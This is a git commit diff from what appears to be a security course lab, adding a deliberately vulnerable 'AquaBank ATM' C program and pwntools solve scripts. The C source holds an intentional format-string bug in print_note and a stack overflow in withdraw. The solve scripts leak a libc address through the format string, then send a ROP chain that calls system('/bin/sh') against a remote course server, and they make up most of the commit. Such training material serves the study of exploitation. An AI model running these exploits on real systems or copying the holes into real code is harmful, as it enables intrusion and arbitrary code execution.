rop and lab3_4_recap

2026-05-20 12:45:03 +02:00
parent c9dbb784b4
commit fa309f3919
50 changed files with 1083 additions and 0 deletions
--- a/lab3_4_recap/02_aquabank_atm/.gdb_history
+++ b/lab3_4_recap/02_aquabank_atm/.gdb_history
@@ -0,0 +1,30 @@
+b withdrawal
+b withdraw
+r
+got
+vmmap
+display/w &note
+b withdraw
+r
+display/w &note
+quit
+display/w note
+display/w &note
+3
+r
+mmap
+vmap
+vmmap
+quit
+b withdraw
+r
+vmmap
+quit
+vmmap
+r
+vmmap
+b *withdraw
+r
+vmmap
+vmmap libc
+quit
--- a/lab3_4_recap/02_aquabank_atm/aquabank-atm
+++ b/lab3_4_recap/02_aquabank_atm/aquabank-atm
--- a/lab3_4_recap/02_aquabank_atm/aquabank-atm_patched
+++ b/lab3_4_recap/02_aquabank_atm/aquabank-atm_patched
--- a/lab3_4_recap/02_aquabank_atm/find_libc.py
+++ b/lab3_4_recap/02_aquabank_atm/find_libc.py
@@ -0,0 +1,18 @@
+from pwn import *
+
+context.binary = elf = ELF("./aquabank-atm_patched", checksec=False)
+p = process(elf.path)
+# p = remote("offsec.m0lecon.it", 13523)
+print(p.recvuntil(b"> "))
+for i in range(1, 400):
+    p.sendline(b"1")
+    p.recvuntil(b"Type your customer note: ")
+    payload = f"%{i}$p"
+    p.sendline(payload.encode())
+    p.recvuntil(b"> ")
+    p.sendline(b"2")
+    p.recvuntil(b"--- Your customer note ---\n")
+    addr = p.recvline()
+    if b"0x7f" in addr:
+        print(f"Address:{addr} at pos:{i}")
+    p.recvuntil(b"> ")
--- a/lab3_4_recap/02_aquabank_atm/ld-2.39.so
+++ b/lab3_4_recap/02_aquabank_atm/ld-2.39.so
--- a/lab3_4_recap/02_aquabank_atm/libc.so.6
+++ b/lab3_4_recap/02_aquabank_atm/libc.so.6
--- a/lab3_4_recap/02_aquabank_atm/main.c
+++ b/lab3_4_recap/02_aquabank_atm/main.c
@@ -0,0 +1,76 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+#define NOTE_MAX 96
+
+static char note[NOTE_MAX];
+
+static void setup(void) {
+    setvbuf(stdin, NULL, _IONBF, 0);
+    setvbuf(stdout, NULL, _IONBF, 0);
+    setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+static void banner(void) {
+    puts("=== Welcome to AquaBank ATM, v4.0 ===");
+    puts("Set a customer note, then withdraw at your convenience.");
+}
+
+static void set_note(void) {
+    printf("Type your customer note: ");
+    fflush(stdout);
+    if (!fgets(note, sizeof(note), stdin)) return;
+    note[strcspn(note, "\n")] = 0;
+    puts("Saved.");
+}
+
+static void print_note(void) {
+    puts("--- Your customer note ---");
+    printf(note);
+    puts("");
+    puts("--------------------------");
+}
+
+static void withdraw(void) {
+    char from[32];
+    char amount[32];
+    char memo[64];
+
+    printf("From account: ");  fflush(stdout); fgets(from,   sizeof(from),   stdin);
+    printf("Amount: ");        fflush(stdout); fgets(amount, sizeof(amount), stdin);
+    puts("Withdrawal memo (be brief):");
+
+    fgets(memo, 256, stdin);
+
+    printf("Queued withdrawal from %samount %s\n", from, amount);
+}
+
+static void menu(void) {
+    char line[16];
+    while (1) {
+        puts("");
+        puts("=== AquaBank ATM ===");
+        puts("1) Set customer note");
+        puts("2) Print customer note");
+        puts("3) Withdraw");
+        puts("4) Exit");
+        printf("> "); fflush(stdout);
+        if (!fgets(line, sizeof(line), stdin)) break;
+        switch (atoi(line)) {
+            case 1: set_note();    break;
+            case 2: print_note();  break;
+            case 3: withdraw();    break;
+            case 4: puts("Bye");   return;
+            default: puts("?");
+        }
+    }
+}
+
+int main(void) {
+    setup();
+    banner();
+    menu();
+    return 0;
+}
--- a/lab3_4_recap/02_aquabank_atm/solve.py
+++ b/lab3_4_recap/02_aquabank_atm/solve.py
@@ -0,0 +1,91 @@
+#!/usr/bin/env python3
+
+from pwn import *
+
+# exe = ELF("./aquabank-atm_patched")
+exe = ELF("./aquabank-atm")
+libc = ELF("./libc.so.6")
+ld = ELF("./ld-2.39.so")
+
+context.binary = exe
+
+
+def conn():
+    if args.LOCAL:
+        r = process([exe.path])
+        if args.GDB:
+            gdb.attach(r)
+    else:
+        r = remote("offsec.m0lecon.it", 13523)
+
+    return r
+
+
+def main():
+    p = conn()
+    OFF = 128  # On withdrawal
+    p.recvuntil(b"> ")
+    p.sendline(b"1")
+    # payload = b"%114$p" (local offset)
+    # payload = b"%74$p"  # (remote offset)
+    # payload = b"%112$p"
+    # payload = b"%33$p"
+    payload = b"%33$p"
+    p.sendline(payload)
+    p.recvuntil(b"> ")
+    p.sendline(b"2")
+    p.recvuntil(b"--- Your customer note ---\n")
+    addr = int(p.recvline().strip(), 16)
+    # libc.address = addr & ~0xFFFFF
+    libc.address = addr - libc.symbols["__libc_start_main"] - 0x8B
+    # libc.address = addr & ~0xFFF
+    print(f"Address: {hex(libc.address)}")
+    BINSH = next(libc.search(b"/bin/sh\x00"))
+    # Stage 2 write the binsh string at a fixed address (note array)
+    # binsh = b"/bin/sh"
+    # p.recvuntil(b"> ")
+    # p.sendline(b"1")
+    # p.sendline(binsh)
+    print(p.recvuntil(b"> "))
+
+    # Stage 3 Buffer overflow and system call
+    p.sendline(b"3")
+    print(p.recvuntil(b"From account: "))
+    p.sendline(b"A")
+    print(p.recvuntil(b"Amount: "))
+    p.sendline(b"10")
+    print(p.recvuntil(b"Withdrawal memo (be brief):\n"))
+    ret = 0x000000000040101A
+    ret_libc = 0x000000000002882F
+    pop_rdi = 0x000000000010F78B
+    pop_rsi = 0x0000000000110A7D
+    syscall = 0x00000000000288B5
+    pop_rax = 0x00000000000DD237
+    payload = flat(
+        b"A" * (OFF),
+        p64(ret),
+        # p64(ret_libc),
+        p64(libc.address + pop_rdi),
+        # p64(exe.symbols["note"]),
+        p64(BINSH),
+        # p64(ret_libc),
+        # p64(exe.symbols["main"]),
+        # p64(libc.symbols["puts"]),
+        p64(ret),
+        p64(libc.symbols["system"]),
+        # p64(exe.symbols["main"]),
+        # p64(libc.symbols["system"]),
+    )
+    # p.interactive()
+    p.send(payload + b"\n")
+    # p.interactive()
+    # %114$p
+    # %130$p
+
+    # good luck pwning :)
+
+    p.interactive()
+
+
+if __name__ == "__main__":
+    main()
--- a/lab3_4_recap/02_aquabank_atm/solve.py.bak
+++ b/lab3_4_recap/02_aquabank_atm/solve.py.bak
@@ -0,0 +1,55 @@
+from pwn import *
+
+OFF = 128  # On withdrawal
+# %25$lx
+context.binary = elf = ELF("./aquabank-atm", checksec=False)
+libc = ELF("libc.so.6", checksec=False)
+# libc = ELF("/usr/lib/libc.so.6", checksec=False)
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13508)
+PRINTF_GOT = elf.got["printf"]
+# Uso printf per stamparmi il libc address
+# Uso save note per salvarmi /bin/sh nel buffer
+# Salvo indirizzo di libc e chiamo system con /bin/sh
+p.recvuntil(b"> ")
+p.sendline(b"1")
+# payload = b"%114$p" (local offset)
+payload = b"%74$p"  # (remote offset)
+p.sendline(payload)
+p.recvuntilb(b"> ")
+p.sendline(b"2")
+p.recvuntil(b"--- Your customer note ---\n")
+addr = int(p.recvline().strip(), 16)
+libc.address = addr
+print(f"Address: {hex(addr)}")
+# Stage 2 write the binsh string at a fixed address (note array)
+binsh = b"/bin/sh"
+note_addr = 0x4040A0
+p.recvuntilb(b"> ")
+p.sendline(b"1")
+p.sendline(binsh)
+print(p.recvuntilb(b"> "))
+#
+# Stage 3 Buffer overflow and system call
+p.sendline(b"3")
+print(p.recvuntil(b"From account: "))
+p.sendline(b"A")
+print(p.recvuntil(b"Amount: "))
+p.sendline(b"10")
+print(p.recvuntil(b"Withdrawal memo (be brief):\n"))
+ret = 0x000000000040101A
+ret_libc = 0x000000000002882F
+pop_rdi = 0x000000000010F78B
+payload = flat(
+    b"A" * (OFF),
+    # p64(ret),
+    p64(libc.address + pop_rdi),
+    p64(note_addr),
+    p64(
+        libc.symbols["system"],
+    ),
+)
+p.sendline(payload)
+p.interactive()
+# %114$p
+# %130$p